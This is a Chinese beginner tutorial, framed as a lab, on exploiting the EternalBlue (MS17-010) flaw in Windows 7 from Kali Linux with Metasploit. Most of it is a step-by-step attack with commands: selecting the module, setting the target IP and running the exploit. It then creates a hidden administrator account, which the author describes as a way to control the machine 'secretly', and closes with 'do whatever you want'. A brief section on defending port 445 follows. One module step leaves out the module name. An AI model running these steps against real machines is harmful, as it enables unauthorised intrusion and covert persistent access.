利用永恒之蓝渗透win7 (低配版)
环境:
攻击机: kali linux2.0系统
(https://www.kali.org/downloads/)
靶 机: window7(链接:http://pan.baidu.com/s/1jIzOqRc 密码:vz8p)
或window server 2008
漏 洞:永恒之蓝
步骤:
(这里实际操作时,我会用ssh远程连接kali 操作,ssh的使用就不介绍了,自己搜)
第一步:打开metasploit
命令:root@kali:~# msfconsole
第二步:
使用永恒之蓝模块,
命令:
root@kali:~# search ms17-01
root@kali:~# use
第三步:
填充各种指令,主要是靶机IP,其中445端口已经默认了,其他不用改
命令:
root@kali:~# show options
root@kali:~# set RHOST 172.19.120.68
第四步:
攻击
命令:
root@kali:~# exploit 或者run
显示以及拿到靶机的控制权,
第五步:
创建新用户,偷偷的控制使用,
命令:
net user admin 123456 /add
第六步:
提权,将新创建的用户admin提到管理员权限
命令:
net localgroup administrators admin /add
查看权限:
net user admin
第六步:
远程连接 admin 用户
渗透成功,接下来你就可以做你想做的了。
防御办法:
1,网上下载补丁,
2,关闭445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
检测445端口是否开启:
netstat -ano -p tcp | find “445”
总结:
实验过程遇到好多问题,解决办法:先自己各种尝试,在上网搜相关知识,最后还不会,就去请教大神。
另外这个实验比较简单,局限性较大,可以作为入门使用,网上好像有永恒之蓝漏洞的复现,使用python 来做的,暂时还不太懂,等有机会自己也去尝试尝试。